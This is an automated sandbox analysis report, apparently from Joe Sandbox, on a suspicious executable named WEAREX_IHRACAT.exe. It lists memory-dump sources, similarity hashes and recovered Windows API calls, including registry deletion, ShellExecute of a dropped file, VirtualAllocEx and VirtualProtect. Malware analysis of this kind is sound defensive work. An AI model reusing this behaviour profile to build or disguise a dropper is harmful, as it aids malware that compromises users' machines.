                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
                          • Instruction ID: 161b61abd2ed0806a8baee45b40892b28aad2ec91d5fdb0f87a4ef8c893441ab
                          • Opcode Fuzzy Hash: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
                          • Instruction Fuzzy Hash: 33911370E04228CBEF28CF98C8547ADBBB1FF44305F15816AD456BB291C7785A96DF48
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
                          • Instruction ID: 72176883cd04ce23c5606ed187e212a481aff986895f719837de05734152d470
                          • Opcode Fuzzy Hash: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
                          • Instruction Fuzzy Hash: C2813471E00228CBDF24CFA8C844BADBBB1FF44305F25816AD416BB281C7789A96DF45
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
                          • Instruction ID: 37bedb047a1cdcb2186193905b10d92141f0d7a21aac59a3988bc0e8c58e701c
                          • Opcode Fuzzy Hash: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
                          • Instruction Fuzzy Hash: 8A816671E04228DBDF24CFA8C844BADBBB0FF44305F12816AD856BB281C7785A96DF44
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
                          • Instruction ID: 06582d6994b983150c25b1790107e31aec949b245444a1a6456fb9016973e262
                          • Opcode Fuzzy Hash: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
                          • Instruction Fuzzy Hash: 33711371E00228DBDF24CFA8C844BADBBB1FF48305F15816AD416BB291C7789A96DF54
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
                          • Instruction ID: ebc9a81060a596ad431c80b1d1758c5c700cdc7d234e992f1b297214c353d564
                          • Opcode Fuzzy Hash: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
                          • Instruction Fuzzy Hash: 19713371E00228CBDF28CF98C844BADBBB1FF44301F15816AD416BB281C7789A96DF48
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
                          • Instruction ID: 9ba1edbe5cfe128ed99381d9e4cb31fcf1809be200f9a36a9650a2a134254892
                          • Opcode Fuzzy Hash: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
                          • Instruction Fuzzy Hash: D8713571E00228DBDF28CF98C844BADBBB1FF44305F15816AD456BB291C7789A96DF44
                          APIs
                          • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FC3
                            • Part of subcall function 00405192: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                            • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                            • Part of subcall function 00405192: lstrcatW.KERNEL32(004216B0,00402D92,00402D92,004216B0,00000000,00000000,00000000), ref: 004051ED
                            • Part of subcall function 00405192: SetWindowTextW.USER32(004216B0,004216B0), ref: 004051FF
                            • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                            • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                            • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FD4
                          • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402051
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          APIs
                            • Part of subcall function 00402C42: RegOpenKeyExW.KERNELBASE(00000000,0000016D,00000000,00000022,00000000,?,?), ref: 00402C6A
                          • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402481
                          • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 00402494
                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nseB6DC.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          APIs
                          • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,C:\Users\user\gangningerne\jot\mtn\Discomplexion,?), ref: 00401E3D
                          Strings
                          • C:\Users\user\gangningerne\jot\mtn\Discomplexion, xrefs: 00401E26
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          APIs
                          • VirtualAllocEx.KERNELBASE(00000000), ref: 1000292F
                          • GetLastError.KERNEL32 ref: 10002A36
                          Memory Dump Source
                          • Source File: 00000000.00000002.2459321793.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                          APIs
                            • Part of subcall function 00402C42: RegOpenKeyExW.KERNELBASE(00000000,0000016D,00000000,00000022,00000000,?,?), ref: 00402C6A
                          • RegQueryValueExW.ADVAPI32(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 0040240F
                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nseB6DC.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          APIs
                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          APIs
                            • Part of subcall function 00402C42: RegOpenKeyExW.KERNELBASE(00000000,0000016D,00000000,00000022,00000000,?,?), ref: 00402C6A
                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F2
                          • RegCloseKey.ADVAPI32(00000000), ref: 004022FB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          APIs
                          • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DDD
                          • EnableWindow.USER32(00000000,00000000), ref: 00401DE8
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: Window$EnableShow
                          • String ID:
                          • API String ID: 1136574915-0
                          • Opcode ID: b643271b868b9a40f851d1ef19f11c0424dbe1118e1d4d70f38c684e3c8424a9
                          • Instruction ID: 0a70c1ef7b0b049098d210b4544fd1cb3982b30fa54b0c42b808752cdcd1ba25
                          • Opcode Fuzzy Hash: b643271b868b9a40f851d1ef19f11c0424dbe1118e1d4d70f38c684e3c8424a9
                          • Instruction Fuzzy Hash: 15E08CB2B04100DBD710AFA5AA8899D3378AB90369B60087BF502F10D1C6B86C008A7E
                          APIs
                          • GetFileAttributesW.KERNELBASE(00000003,00402DFD,C:\Users\user\Desktop\WEAREX_IHRACAT.exe,80000000,00000003), ref: 00405B58
                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: File$AttributesCreate
                          • String ID:
                          • API String ID: 415043291-0
                          • Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                          • Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
                          • Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                          • Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16
                          APIs
                          • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 00402711
                            • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: FilePointerwsprintf
                          • String ID:
                          • API String ID: 327478801-0
                          • Opcode ID: 98ccbb7068feabc3c0ae90a56470a6d5818c3af9d2cd9401b954f1a0f04dcc0c
                          • Instruction ID: e22c1b7e3cb1808aafcc1ab2efb5fc6ea69776b3c427c7ac8c77fd4a8c9c6d31
                          • Opcode Fuzzy Hash: 98ccbb7068feabc3c0ae90a56470a6d5818c3af9d2cd9401b954f1a0f04dcc0c
                          • Instruction Fuzzy Hash: D8E01AB2B14114AADB01AFA5AD4ACAEB678EB05319F60083BF101B00D1C67959019A7E
                          APIs
                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402288
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: PrivateProfileStringWrite
                          • String ID:
                          • API String ID: 390214022-0
                          • Opcode ID: ff37467d196542fb058f015d684c25ad389eeca81ff6bef522b3f91f96979ab6
                          • Instruction ID: fec69ff260b0ac9ecd577f12e686b41ce403e552977328a8d437569390afa8be
                          • Opcode Fuzzy Hash: ff37467d196542fb058f015d684c25ad389eeca81ff6bef522b3f91f96979ab6
                          • Instruction Fuzzy Hash: 22E086329041246ADB103EF20E8DD7F32785B45714B54023FB511BA2C2D5FC1D42476E
                          APIs
                          • RegOpenKeyExW.KERNELBASE(00000000,0000016D,00000000,00000022,00000000,?,?), ref: 00402C6A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: Open
                          • String ID:
                          • API String ID: 71445658-0
                          • Opcode ID: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
                          • Instruction ID: e3df8b11752b843856ad965a2913e8001498b25c252565f1a48e325e263545e5
                          • Opcode Fuzzy Hash: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
                          • Instruction Fuzzy Hash: 88E04F76280108BADB00DFA4ED46E9577ECEB14701F004425B608D6091C674E5008768
                          APIs
                          • ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330A,00409230,00409230,004031FC,00413E78,00004000,?,00000000,?), ref: 00405BEB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                          • Instruction ID: bc424be8b840dd139efea3d7e203f87911aff5df88b68b997cf3f66dc638529d
                          • Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                          • Instruction Fuzzy Hash: 25E0EC3261425AABDF50AEA59C04EEB7B6CFB05360F044432F915E7190D631F921ABA9
                          APIs
                          • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027B4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2459321793.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000000.00000002.2459293214.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                          • Associated: 00000000.00000002.2459349894.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                          • Associated: 00000000.00000002.2459378881.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_10000000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                          • Instruction ID: 4a9ded8e7257bdb173b40b31e6f72bab7f1256b0bf9ca600b2aeebe95f436f9e
                          • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                          • Instruction Fuzzy Hash: CFF09BF19097A0DEF350DF688C847063BE4E3983C4B03852AE3A8E6268EB344048CF19
                          APIs
                          • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: b215341e9a48861ce1ae71868c0b38dd620c6d649e98988d9f5b4c3be07a7ee8
                          • Instruction ID: 9dcfef7e452db0a7b9eae0ecc372c740654949990ed8f849d8faaf285a661dbe
                          • Opcode Fuzzy Hash: b215341e9a48861ce1ae71868c0b38dd620c6d649e98988d9f5b4c3be07a7ee8
                          • Instruction Fuzzy Hash: 8BD012B2708100D7DB10DFA59A0899D77749B15325F700977E101F21D0D2B895519A2A
                          APIs
                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE5,?), ref: 0040331B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: FilePointer
                          • String ID:
                          • API String ID: 973152223-0
                          • Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                          • Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
                          • Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                          • Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D
                          APIs
                          • Sleep.KERNELBASE(00000000), ref: 004014E6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: Sleep
                          • String ID:
                          • API String ID: 3472027048-0
                          • Opcode ID: 4ce028c416631f4879f61a6c47eaa424c852bb073f15e560c5dd11f99f423e06
                          • Instruction ID: 218267b357b67079b54de8dffa8c027c75f66e7c1ef01c1e874d3fe206bc0dcd
                          • Opcode Fuzzy Hash: 4ce028c416631f4879f61a6c47eaa424c852bb073f15e560c5dd11f99f423e06
                          • Instruction Fuzzy Hash: A3D0C9B7B181009BE750EFB9AE8985B73A8E7513297604C73D942F20A1D578D8028A79
                          APIs
                          • GlobalAlloc.KERNELBASE(00000040,?,10001259,?,?,10001534,?,10001020,10001019,00000001), ref: 10001225
                          Memory Dump Source
                          • Source File: 00000000.00000002.2459321793.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_10000000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: AllocGlobal
                          • String ID:
                          • API String ID: 3761449716-0
                          • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                          • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                          • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                          • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
                          APIs
                          • GetDlgItem.USER32(?,00000403), ref: 00405330
                          • GetDlgItem.USER32(?,000003EE), ref: 0040533F
                          • GetClientRect.USER32(?,?), ref: 0040537C
                          • GetSystemMetrics.USER32(00000015), ref: 00405384
                          • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004053A5
                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B6
                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053C9
                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D7
                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053EA
                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040540C
                          • ShowWindow.USER32(?,00000008), ref: 00405420
                          • GetDlgItem.USER32(?,000003EC), ref: 00405441
                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405451
                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040546A
                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405476
                          • GetDlgItem.USER32(?,000003F8), ref: 0040534E
                            • Part of subcall function 00404162: SendMessageW.USER32(00000028,?,00000001,00403F8E), ref: 00404170
                          • GetDlgItem.USER32(?,000003EC), ref: 00405493
                          • CreateThread.KERNEL32(00000000,00000000,Function_00005265,00000000), ref: 004054A1
                          • CloseHandle.KERNEL32(00000000), ref: 004054A8
                          • ShowWindow.USER32(00000000), ref: 004054CC
                          • ShowWindow.USER32(?,00000008), ref: 004054D1
                          • ShowWindow.USER32(00000008), ref: 0040551B
                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040554F
                          • CreatePopupMenu.USER32 ref: 00405560
                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405574
                          • GetWindowRect.USER32(?,?), ref: 00405594
                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AD
                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E5
                          • OpenClipboard.USER32(00000000), ref: 004055F5
                          • EmptyClipboard.USER32 ref: 004055FB
                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405607
                          • GlobalLock.KERNEL32(00000000), ref: 00405611
                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405625
                          • GlobalUnlock.KERNEL32(00000000), ref: 00405645
                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405650
                          • CloseClipboard.USER32 ref: 00405656
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                          • String ID: {
                          • API String ID: 590372296-366298937
                          • Opcode ID: 0272c2246cca4647d700f70f2fd171747a3fdfbbef28cbeed5ce4a742598da06
                          • Instruction ID: dd9d9050def2d8c918bbc93d53338e60564b8b02708ef31213df2d5f0290820b
                          • Opcode Fuzzy Hash: 0272c2246cca4647d700f70f2fd171747a3fdfbbef28cbeed5ce4a742598da06
                          • Instruction Fuzzy Hash: 51B15C70900209BFDB219F60DD89EAE7B79FB04355F40803AFA05BA1A0C7759E52DF69
                          APIs
                          • GetDlgItem.USER32(?,000003F9), ref: 00404B26
                          • GetDlgItem.USER32(?,00000408), ref: 00404B31
                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7B
                          • LoadBitmapW.USER32(0000006E), ref: 00404B8E
                          • SetWindowLongW.USER32(?,000000FC,00405106), ref: 00404BA7
                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBB
                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCD
                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404BE3
